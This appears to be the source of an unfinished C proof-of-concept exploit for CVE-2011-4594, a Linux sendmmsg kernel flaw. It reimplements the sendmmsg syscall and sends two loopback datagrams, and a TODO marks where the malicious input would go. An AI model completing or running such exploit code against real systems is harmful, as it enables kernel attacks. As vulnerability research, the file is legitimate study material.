1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
|
/*
* Socket Splickt
* by zx2c4
*
* This is an attempt to exploit CVE-2011-4594.
*
* It was patched in bc909d9ddbf7778371e36a651d6e4194b1cc7d4c.
*
*/
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/ethernet.h>
#include <linux/if_packet.h>
#include <asm/unistd.h>
#include <errno.h>
#ifndef __NR_sendmmsg
#if defined( __PPC__)
#define __NR_sendmmsg 349
#elif defined(__x86_64__)
#define __NR_sendmmsg 307
#elif defined(__i386__)
#define __NR_sendmmsg 345
#else
#error __NR_sendmmsg not defined
#endif
#endif
struct reimp_mmsghdr {
struct msghdr msg_hdr;
unsigned int msg_len;
};
static inline int reimp_sendmmsg(int fd, struct reimp_mmsghdr *mmsg, unsigned int vlen, unsigned int flags)
{
return syscall(__NR_sendmmsg, fd, mmsg, vlen, flags, NULL);
}
int main(int argc, char *argv[])
{
const int fd = socket(AF_INET, SOCK_DGRAM, 0);
char buf[10];
struct iovec iovec[1];
struct reimp_mmsghdr datagram[2];
struct sockaddr_in addr;
memset(buf, 0, sizeof(buf));
memset(iovec, 0, sizeof(iovec));
memset(&datagram[0], 0, sizeof(datagram[0]));
memset(&datagram[1], 0, sizeof(datagram[1]));
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
addr.sin_port = htons(10000);
iovec[0].iov_base = buf;
iovec[0].iov_len = sizeof(buf);
datagram[0].msg_hdr.msg_iov = iovec;
datagram[0].msg_hdr.msg_iovlen = 1;
datagram[1].msg_hdr.msg_iov = iovec;
datagram[1].msg_hdr.msg_iovlen = 1;
/* TODO: Pass something naughty here. */
datagram[0].msg_hdr.msg_name = &addr;
datagram[0].msg_hdr.msg_namelen = sizeof(addr);
datagram[1].msg_hdr.msg_name = &addr;
datagram[1].msg_hdr.msg_namelen = sizeof(addr);
int ret;
if ((ret = reimp_sendmmsg(fd, datagram, 2, 0)) < 0) {
perror("reimp_sendmmsg");
exit(1);
}
printf("Sent %d packets.\n", ret);
return 0;
}
|